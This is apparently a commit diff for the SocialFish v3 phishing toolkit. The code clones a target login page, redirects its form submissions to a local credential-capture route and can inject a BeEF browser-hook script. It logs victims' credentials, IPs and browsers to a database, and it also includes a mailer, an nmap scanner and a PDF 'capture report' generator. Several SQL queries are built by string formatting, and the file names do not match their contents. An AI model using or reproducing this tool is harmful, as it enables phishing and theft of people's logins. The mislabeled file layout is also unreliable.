V3 Released

Author: A1S0N

SocialFish.py

@@ -0,0 +1,7 @@
+import shutil
+
+def cleanFake():
+	try:
+		shutil.rmtree('templates/fake')
+	except:
+		pass

__init__.py

@@ -0,0 +1,28 @@
+import requests
+import re
+import os
+
+# CLONING FUNCTIONS --------------------------------------------------------------------------------------------
+def clone(url, user_agent, beef):
+    try:        
+        u = url.replace('://', '-')
+        q = 'templates/fake/{}/{}'.format(user_agent, u)
+        os.makedirs(q, exist_ok=True)
+        temp_ind_path = 'templates/fake/{}/{}/index.html'.format(user_agent, u)
+        headers = {'User-Agent': user_agent}
+        r = requests.get(url, headers=headers)
+        html = r.text        
+        old_regular = re.findall(r'action="([^ >"]*)"',html)
+        new_regular = '/login'
+        for r in old_regular:         
+            print(r)
+            html = html.replace(r, new_regular)
+        if beef == 'yes':
+            inject = '<script src=":3000/hook.js" type="text/javascript"></script></body>'
+            html = html.replace("</body>", inject)
+        new_html = open(temp_ind_path, 'w')
+        new_html.write(html.encode('ascii', 'ignore').decode('ascii'))
+        new_html.close()
+    except:
+        pass
+#--------------------------------------------------------------------------------------------------------------------

core/SOCIALFISH_transparent.png

@@ -0,0 +1,12 @@
+# COMPRESS APP --------------------------------------------------------------------------------------------------
+COMPRESS_MIMETYPES = ['text/html', 'text/css', 'text/xml', 'application/json', 'application/javascript']
+COMPRESS_LEVEL = 6
+COMPRESS_MIN_SIZE = 500
+# ---------------------------------------------------------------------------------------------------------------
+# LOCAL CONFIGS--------------------------------------------------------------------------------------------------
+DATABASE = "./database.db"
+url = 'https://github.com/UndeadSec/SocialFish'
+red = 'https://github.com/UndeadSec/SocialFish'
+sta = 'x'
+APP_SECRET_KEY = '<CHANGE ME SF>'
+# ---------------------------------------------------------------------------------------------------------------

core/__pycache__/cleanFake.cpython-36.pyc

@@ -0,0 +1,74 @@
+import os
+import sqlite3
+from core.genToken import genToken, genQRCode
+
+def initDB(DATABASE):
+    if not os.path.exists(DATABASE):
+        conn = sqlite3.connect(DATABASE)
+        cur = conn.cursor()
+        create_table_sql = """ CREATE TABLE IF NOT EXISTS creds (
+                                            id integer PRIMARY KEY,
+                                            url text NOT NULL,
+                                            jdoc text,
+                                            pdate numeric,
+                                            browser text,
+                                            bversion text,
+                                            platform text,
+                                            rip text
+                                        ); """
+        cur.execute(create_table_sql)
+        conn.commit()
+        create_table_sql2 = """ CREATE TABLE IF NOT EXISTS socialfish (
+                                            id integer PRIMARY KEY,                                        
+                                            clicks integer,
+                                            attacks integer,
+                                            token text                                       
+                                        ); """
+        cur.execute(create_table_sql2)  
+        conn.commit()                       
+        sql = ''' INSERT INTO socialfish(id,clicks,attacks,token)
+                  VALUES(?,?,?,?) '''
+        i = 1
+        c = 0
+        a = 0
+        t = genToken()
+        data = (i, c, a, t)
+        cur.execute(sql,data)
+        conn.commit()
+        create_table_sql3 = """ CREATE TABLE IF NOT EXISTS sfmail (
+                                            id integer PRIMARY KEY,                                        
+                                            email VARCHAR,                                        
+                                            smtp text,
+                                            port text                                       
+                                        ); """
+        cur.execute(create_table_sql3)
+        conn.commit()
+        sql = ''' INSERT INTO sfmail(id,email,smtp,port)
+                  VALUES(?,?,?,?) '''
+        i = 1
+        e = ""
+        s = ""
+        p = ""
+        data = (i, e, s, p)
+        cur.execute(sql,data)
+        conn.commit()
+        create_table_sql4 = """ CREATE TABLE IF NOT EXISTS professionals (
+                                            id integer PRIMARY KEY,                                        
+                                            email VARCHAR,                                        
+                                            name text,
+                                            obs text
+                                        ); """
+        cur.execute(create_table_sql4)
+        conn.commit()
+        create_table_sql5 = """ CREATE TABLE IF NOT EXISTS companies (
+                                            id integer PRIMARY KEY,                                        
+                                            email VARCHAR,                                        
+                                            name text,
+                                            phone text,
+                                            address text,
+                                            site text                                    
+                                        ); """
+        cur.execute(create_table_sql5)
+        conn.commit()
+        conn.close()
+        genQRCode()

core/__pycache__/clonesf.cpython-36.pyc

@@ -0,0 +1,13 @@
+import sqlite3
+
+def genReport(DATABASE, subject, user, company, date_range, target):
+	conn = sqlite3.connect(DATABASE)
+	cur = conn.cursor()	
+	date_range = date_range.replace(' ', '')
+	date_range = date_range.replace('/','-')
+	date_range = date_range.split('_')
+	date_start = date_range[0]
+	date_end = date_range[1]
+	sql = '''Select * from creds where pdate between '{}' and '{}' '''.format(date_start, date_end)
+	results = cur.execute(sql).fetchall()
+	print(results)

core/__pycache__/config.cpython-36.pyc

@@ -0,0 +1,16 @@
+import secrets
+import qrcode.image.svg
+import qrcode
+import os
+
+def genToken():
+    return ''.join(secrets.token_urlsafe(16))
+
+def genQRCode():
+	qr = 'templates/static/token/qrcode.svg'
+	if not os.path.exists(qr):
+		factory = qrcode.image.svg.SvgImage
+		img = qrcode.make(genToken(), image_factory=factory)
+		img.save(qr)
+	else:
+		os.remove(qr)

core/__pycache__/dbsf.cpython-36.pyc

@@ -0,0 +1,111 @@
+import os
+from pylatex import Document, PageStyle, Head, Foot, MiniPage, \
+    StandAloneGraphic, MultiColumn, Tabu, LongTabu, LargeText, MediumText, \
+    LineBreak, NewPage, Tabularx, TextColor, simple_page_number, Command
+from pylatex.utils import bold, NoEscape
+from sqlite3 import connect
+from ast import literal_eval
+from time import strftime
+from webbrowser import open_new
+
+def generate_report(DATABASE, cpm):
+
+    conex = connect(DATABASE)
+    cursor = conex.cursor()
+    list_urls = []
+       
+    for urls in cursor.execute('SELECT DISTINCT url FROM creds'): list_urls += urls
+    _cURL = cpm
+    choose_url = 'http' if _cURL == 'All' else _cURL
+    result_query = []
+    for row in cursor.execute('SELECT * FROM creds WHERE url GLOB "*{}*"'.format(choose_url)):
+        result_query += row
+        
+    result_count = cursor.execute('SELECT COUNT(*) FROM creds WHERE url GLOB "*{}*"'.format(choose_url)).fetchone()
+    
+    return result_query, result_count
+
+def generate_unique(DATABASE,cpm):
+    geometry_options = {
+        "head": "60pt",
+        "margin": "0.5in",
+        "bottom": "0.6in",
+        "includeheadfoot": True
+    }
+    doc = Document(geometry_options=geometry_options)
+
+    first_page = PageStyle("firstpage")
+
+    with first_page.create(Head("L")) as header_left:
+        with header_left.create(MiniPage(width=NoEscape(r"0.49\textwidth"),
+                                         pos='c', align='L')) as logo_wrapper:
+            logo_file = os.path.join(os.path.dirname(__file__),
+                                     'SOCIALFISH_transparent.png')
+            logo_wrapper.append(StandAloneGraphic(image_options="width=120px",
+                                filename=logo_file))
+    
+    with first_page.create(Head("R")) as header_right:
+        with header_right.create(MiniPage(width=NoEscape(r'0.49\textwidth'),
+                                          pos='c', align='r')) as wrapper_right:
+            wrapper_right.append(LargeText(bold('SOCIALFISH')))
+            wrapper_right.append(LineBreak())
+            wrapper_right.append(MediumText(bold('UNDEADSEC')))
+            wrapper_right.append(LineBreak())
+            wrapper_right.append(NoEscape(r'\today'))
+
+    with first_page.create(Head('C')) as header_center:
+        header_center.append('CAPTURE REPORT')
+
+    with first_page.create(Foot("C")) as footer:
+        message = "Important message please read"
+
+    doc.preamble.append(first_page)
+
+    with doc.create(Tabu("X[l] X[r]")) as first_page_table:
+        customer = MiniPage(width=NoEscape(r"0.49\textwidth"), pos='h')
+        
+        branch = MiniPage(width=NoEscape(r"0.49\textwidth"), pos='t!',
+                          align='r')
+
+        first_page_table.add_row([customer, branch])
+        first_page_table.add_empty_row()
+
+    doc.change_document_style("firstpage")
+    doc.add_color(name="lightgray", model="gray", description="0.80")
+
+    with doc.create(LongTabu("X[15l]",
+                             row_height=1.8)) as data_table:
+        data_table.add_row(["Organization\nCapture IP\nBrowser\nLog\n"],
+                           mapper=bold,
+                           color="lightgray")
+        data_table.add_empty_row()
+        data_table.add_hline()
+
+        result_query, result_count = generate_report(DATABASE,cpm)
+        x = 0
+
+        for i in range(result_count[0]):
+
+            url = result_query[1+x].split('//')[1]
+            ip = result_query[7+x]
+            log_dict = literal_eval(result_query[2+x])
+            
+            if 'skstamp' in log_dict.keys():
+                rm_trash = log_dict.pop('skstamp')
+            elif 'utf8' in log_dict.keys():
+                rm_trash = log_dict.pop('utf8')
+
+            browser = result_query[4+x] + ' v' + result_query[5+x]
+            x = 8*(i+1)
+
+            row_tex = [url+'\n'+ip+'\n'+browser+'\n'+str(log_dict)+'\n']
+
+            if (i % 2) == 0:
+                data_table.add_row(row_tex, color="lightgray")
+            else:
+                data_table.add_row(row_tex)
+
+    doc.append(NewPage())
+    pdf_name = 'Report{}'.format(strftime('-%y%m'))
+    doc.generate_pdf(pdf_name, clean_tex=False)
+    open_new(os.getcwd()+'/'+pdf_name+'.pdf')

core/__pycache__/genReport.cpython-36.pyc

@@ -0,0 +1,28 @@
+import nmap
+import requests
+
+def nScan(ip):
+    nm = nmap.PortScanner()
+    nm.scan(ip, arguments="-F")
+    for host in nm.all_hosts():
+        ports = []
+        protocols = []
+        states = []
+        for proto in nm[host].all_protocols():
+            protocols.append(proto)
+            lport = nm[host][proto].keys()
+            for port in lport:
+                ports.append(port)
+                states.append(nm[host][proto][port]['state'])
+        
+        po = []
+        for p in ports:
+            n = {
+            "Port": str(p),
+            "Name": nm[host][proto][p]['name'],            
+            "Reason": nm[host][proto][p]['reason'],
+            "State": nm[host][proto][p]['state']
+            }
+            po.append(n)
+
+        return po

core/__pycache__/genToken.cpython-36.pyc

@@ -0,0 +1,23 @@
+import smtplib
+from email.mime.multipart import MIMEMultipart
+from email.mime.text import MIMEText
+ 
+def sendMail(subject, email, password, recipient, body, smtp, port):
+	msg = MIMEMultipart()
+	msg['From'] = email
+	msg['To'] = recipient
+	msg['Subject'] = subject
+	 
+	msg.attach(MIMEText(body, 'plain'))
+	 
+	try:
+		server = smtplib.SMTP(smtp, int(port))
+		server.starttls()
+		server.login(email, password)
+		text = msg.as_string()
+		server.sendmail(email, recipient, text)
+		server.quit()
+		return 'ok'
+	except Exception as err:
+		pass	
+		return err

core/__pycache__/report.cpython-36.pyc

@@ -0,0 +1,16 @@
+import requests
+
+# trace GEO IP -------------------------------------------------------------------------------------------------
+
+def tracegeoIp(ip):    
+    try:
+        if '127.0.0.1' == ip:
+            ip = 'https://geoip-db.com/json/'
+        else:
+            ip = 'https://geoip-db.com/jsonp/' + ip
+        result = requests.get(ip).json()        
+    except Exception as e:
+        print(e)
+        result = "Error. Verify your network connection."
+    return result
+# --------------------------------------------------------------------------------------------------------------

core/__pycache__/scansf.cpython-36.pyc

@@ -0,0 +1,23 @@
+import colorama
+
+def head():
+    print(colorama.Style.BRIGHT)
+    print(colorama.Fore.CYAN + '''
+                          '
+                        '   '  UNDEADSEC | t.me/UndeadSec 
+                      '       '  youtube.com/c/UndeadSec - BRAZIL
+                 .  '  .        '                        '
+             '             '      '                   '   '
+  ███████ ████████ ███████ ██ ███████ ██       ███████ ██ ███████ ██   ██ 
+  ██      ██    ██ ██      ██ ██   ██ ██       ██      ██ ██      ██   ██ 
+  ███████ ██    ██ ██      ██ ███████ ██       █████   ██ ███████ ███████ 
+       ██ ██    ██ ██      ██ ██   ██ ██       ██      ██      ██ ██   ██ 
+  ███████ ████████ ███████ ██ ██   ██ ███████  ██      ██ ███████ ██   ██ 
+      .    '   '....'               ..'.      ' .
+         '  .                     .     '          '     '  v3.0Nepture
+               '  .  .  .  .  . '.    .'              '  .
+                   '         '    '. '      Twitter: https://twitter.com/A1S0N_
+                     '       '      '       Site: https://www.undeadsec.com
+                       ' .  '
+                           ''')
+    print(colorama.Fore.GREEN + 'Go to http://0.0.0.0:5000/neptune to start')